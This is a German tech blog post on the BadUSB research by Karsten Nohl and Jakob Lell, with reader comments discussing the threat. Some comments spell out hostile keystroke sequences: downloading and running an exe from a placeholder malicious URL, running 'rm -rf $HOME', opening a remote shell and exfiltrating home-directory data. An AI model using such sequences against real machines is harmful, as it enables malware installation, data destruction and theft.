BadUSB: USB-Sticks sind mal wieder gefährlich

Fotolia_33425328_S_copyright

Auf der Blackhat Konferenz könnten die zwei Deutschen Karsten Nohl und Jakob Lell von SRLabs.de es richtig krachen lassen. Sie wollen demonstrieren, dass die USB-Schnittstelle ein gefährliches Einfallstor ist, sodass jeder speziell präparierte USB-Stick ohne das Zutun eines Anwenders Schaden anrichten kann.

In ihrem Beitrag berichten die Beiden von der Gefährlichkeit der Sticks, da diese sich durch eine entsprechende Modifizierung der Firmware eben nicht nur als USB-Stick ausgeben können, sondern auch als Maus, Scanner oder ähnliches. So könnte ein entsprechend präparierter Stick als Tastatur dienen und  Befehle ausführen – zum Beispiel eine Malware installieren.

Viele USB-Sticks haben Controller verbaut, die sich nach Angaben der Sicherheitsforscher einfach umprogrammieren lassen. Nicht nur das Emulieren einer Tastatur soll möglich sein, sondern man könnte eine Netzwerkkarte nachstellen und die DNS-Einstellungen eines Rechners ändern, um sämtlichen Internetverkehr umzuleiten.

Alternativ lässt sich natürlich jegliche Form von Software – zum Beispiel Viren – direkt installieren. Malwarescanner sollen angeblich machtlos sein, da diese nicht auf die Firmware der Sticks zugreifen können. Eine Demonstration des Ganzen will man auf der BlackHat 2014 am 7. August zeigen. Mal schauen, welche Informationen dabei herauskommen.

Nachrichten dieser Art gibt es ja schon länger, doch mal wieder gut, dass die Thematik wieder groß breitgetreten wird. Es ist nicht mehr nur gefährlich, andere Smartphones oder Sticks zu nutzen, sondern auch die, die man vielleicht zu Werbezwecken geschenkt bekommt.

Gefällt dir der Artikel? Dann teile ihn mit deinen Freunden.

Hallo, ich bin Carsten! Baujahr 1977, Dortmunder im Norden, BVB-Getaufter und Gründer dieses Blogs. Auch zu finden bei Twitter, Google+, Facebook, Instagram und YouTube. PayPal-Kaffeespende. Mail: carsten@caschys.blog

33 Kommentare

  1. Tolles Foto!

  2. Die wichtigste Info fehlt leider, nämlich welche Systeme das betrifft.

  3. Namenlos, weil Cookies gelöscht... says:

    Spannend.
    Ich versuche mir gerade ein sinniges Szenario auszudenken, in dem ein so manipulierter Stick wirklich irgendetwas bewirken kann, aber es fällt mir keins ein. Bitte erleuchte mich jemand!

    Wenn der Stick die DNS Einstellungen ändern sollte, dann muss ja ein OS hochgefahren sein, dann wiederum aber greift das Malewareprogrämmchen aber (theoretisch) ein, so das ein bekannter Virus/Trojaner/bla gehindert wird, etwas zu tun.

    Aber dennoch ein interessantes Konzept finde ich, einem USB-Stick eine virtuelle Tastatur mitzugeben, die dann -wo auch immer- irgendetwas rumtippt.

    Nochmal an die Profis hier: Welche Szenarios wären denn denkbar?

  4. Herr Hauser says:

    Schaffen wir einfach die ganze Technologie ab und leben wie im Mittelalter.

    Dann gibts solche Probleme nicht mehr, dafür genug andere.

  5. @Gast: Es sind alle Betriebssysteme, die etwas mit USB-Geräten anfangen können, betroffen.

    @Namenlos: Das Malwareprogramm kann nichts dagegen unternehmen. Es sieht nur, dass du zwei USB-Geräte angeschlossen hast. Einen USB-Stick und eine Tastatur. Und die Tastatur gibt die Befehle um eine Malware zu installieren. Woher soll es wissen, dass es nicht einfach Maus und Tastatur an einem USB-Hub sind?

  6. @Gast: Jedes System (Windows, Mac OS X, Linux) installiert eine Tastatur ohne Beanstandung und ohne nachzufragen. Betrifft also jedes System.

  7. @Namenlos: „Windows-Taste“ + „R“ -> iexplore http://www.eine-boese-adresse.to/virus.exe -> 2x die Pfeiltaste nach unten -> Enter (exe wird ausgeführt) -> Enter (Admin rechte wird gegeben) -> Malware installiert.

    Die AV-Software (falls bekannt) könnte man darüber ausschalten. Bei einem gezielten(!) Angriff auf eine Business Infrastruktur eine einfache sache da man sollches alles im vorhinaus in erfahrung bringt.

  8. Als ob das was neues wär – hängste in nen präparierten stick zu erst nen usb-hub-controller kannste gleich x andere controller parallel ranschalten – also Netzwerk, Maus, Tastatur und co alles in einem…

  9. @Konstantin: Klar ist es schon länger bekannt. Jedoch hat bis jetzt noch kein OS Hersteller Reagiert.

    Ist würde mir das so vorstellen:
    Ich schliesse eine neue Tastatur an und Windows Fragt mich: „Möchten Sie die Tastatur (Logitech xyz) installieren? Falls Sie nichts tun wird diese in 60 Sekunden automatisch installier“.

  10. Malwarescanner können zwar nicht auf die Firmware des Sticks zugreifen, schreiten aber ein wenn Malware auf’s System gelangt. Auf OS X schützt zusätzlich Gatekeeper (nur Apps auf dem App Store laufen) und die Benutzer und Gruppensteuerung.

  11. Im Prinzip ist jede unbekannte angestöpselte Hardware gefährich.

    Schon letztes Jahr hatten Sicherheitsforscher zum Beispiel gezeigt, wie sich über ein Netzteil Schadsoftware aufs iPhone schleusen ließ.

  12. Gibt es doch schon seit mindestens 4 Jahren. Kann man sogar bestellen: Google nach „USB Rubber Ducky“. Das wird als Tastatur erkannt (Win, Mac, Linux) und kann beliebige Befehle ausführen, wenn es in einem PC gesteckt wird.

  13. Ich kann mir auch nicht vorstellen, dass unter OS X irgend ein Code durch so einen Stick ausgeführt werden kann. Leider ist auf dem Foto ausgerechnet ein MacBook zu sehen.

  14. sung'n'klunglos says:

    Denkbar wäre ein Gerätchen dass wie ein Geldschein-Tester prüft, als was sich ein Stick ausgibt.

  15. @Andreas, warum sollte das unter OSX nicht funktionieren?

    Wenn das Ding eine Tastatur emuliert, dann: apple+space->terminal->apple script um das terminal zu fokussieren->rm -rf $HOME

    Die Technik ist simpel, nen 100% Schutz ist annähernd unmöglich, wenn müßte das OS 100% saubere Firmware für jedes Gerät mitbringen und der Kernel eben diese auf dem Gerät direkt beim anstecken überschreiben.

    • Gerade Apple-Nutzer fühlen sich gerne immun gegen die Gefahr. Dabei wird man auf einem iMac/MacBook eine Infektion kaum bemerken, wenn sie einigermassen gut gemacht ist. Keine Plattenlämpchen, kein WLAN-Lämpchen und Gedenksekunden zwischendurch sind nichts aussergewöhnliches. „Es funktioniert einfach“. Bei Windows dagegen wird man mehrfach darauf hingewiesen, wenn man keine Vorsichtsmaßnahmen ergriffen hat.

  16. @Markus Ritzmann: Unter Linux wirst Du aber auch mit einer „Tastatur“ keinen übermäßig großen Schaden anrichten können, sondern maximal Dein Homeverzeichnis plätten. Denn über eine Tastatur kannst Du ohne Paßwort-Eingabe keine systemweite Software/Malware installieren. Es sein denn, Du wärest als root unterwegs, bzw. hättest anderweitig (sudo) die Sicherheitsmechanismen ausgehebelt.

  17. @Gast

    Oder du startest mit lokalen Rechten eine remote shell über die so ungefährliche „Tastatur“, kannst dir ganz in ruhe das System anschauen, dir einen root-exploit raussuchen und voila…

  18. Was hier mal wieder diskutiert wird.

    1. Diese Gefahren kennt jedes IT-Unternehmen, daher ist diese Demonstration bzw. der Artikel hier einfach nur eine Auffrischung um uns mal wieder aufzuwecken.

    2. Plug&Play ist durchaus gefährlich z.B. für Botnetze.

    3. Die größte Gefahr bilden aber die APTs und da hilft kein Antivirus, oder was auch immer Programm, da die Signatur zugeschnitten ist und keiner damit was anfangen kann.

  19. @Thomas
    Ich denke auch am alleraller-gefährlichsten sind Damen wie auf dem Artikel-Foto.

  20. In der Zeit ist das so beschrieben:

    http://www.zeit.de/digital/datenschutz/2014-07/usb-controller-chip-angriff-srlabs

    Alle BS sind betroffen. Unter UNIX/LINUX (und damit auch Mac) kann die SW dann natürlich „nur“ im erlaubten Bereich Schaden anrichten. Dumm, wer dann als Admin bzw. Root aktiv ist.

  21. Namenlos, weil Cookies gelöscht... says:

    @lux:
    „Schon letztes Jahr hatten Sicherheitsforscher zum Beispiel gezeigt, wie sich über ein Netzteil Schadsoftware aufs iPhone schleusen ließ.“

    Quelle?

  22. Wenn man den öffentlich rechtlichen glauben darf, wird das heute in der Monitor-Sendung um 21.45 demonstriert. http://www1.wdr.de/daserste/monitor/extras/monitorpresse-usb100.html

  23. @Kalle: Nicht wenn die Fake Tastatur (also der USB-Stick) den AV ausschaltet. Meist braucht es dazu wenige Tastaturanschläge und Shortcuts.

  24. @Gast: Deine Persönlichen Daten liegen ja vermutlich alle in deinem Home Verzeichnis. Reicht also schon um irgendwie ne Shell aufzumachen und ein Script auszuführen das alle Daten auf einen Server schaufelt. Wäre doch schon mal ein denkbares Szenario.

  25. @Namenlos
    Auf der vorletzten Black Hat wurde eine Methode gezeigt, mit der ein Angreifer Software auf ein iPhone installieren konnte, wenn am anderen Ende ein Mini PC hängt. Die Methode funktionierte nur, wenn das iPhone nicht gesperrt war (kein Entsperrcode gesetzt), und sie wurde ein Paar Wochen später mit iOS 7 ausser Kraft gesetzt. Seit dem muss man jeder neue Ladequelle vertrauen. Wenn nicht, kommt zwar Ladestrom durchs USB Kabel, aber keine Daten.

    @Mike
    Deine Methode funktioniert aber nur, wenn das Gerät nicht gesperrt ist. Wenn ich meinen Mac irgendwo ungesperrt rumstehen lasse, bin ich selber schuld. Da brauche ich keinen USB Exploit.

  26. @Gast Dachte ich auch zuerst. Aber wenn man es hin bekommt die Firmware eines USB-Sticks so zu manipulieren dann schafft man es auch ein Script einzubauen das auf den Befehl sudo wartet und sich dann, nachdem Enter gedrückt wurde, einklinkt und beliebige Befehle als root ausführen kann.

  27. Man könnte das aber auch positiv verwenden. z.b. um automatisierte Installationen durchzuführen oder Konfigurationen einzuspielen, oder sehe ich das falsch?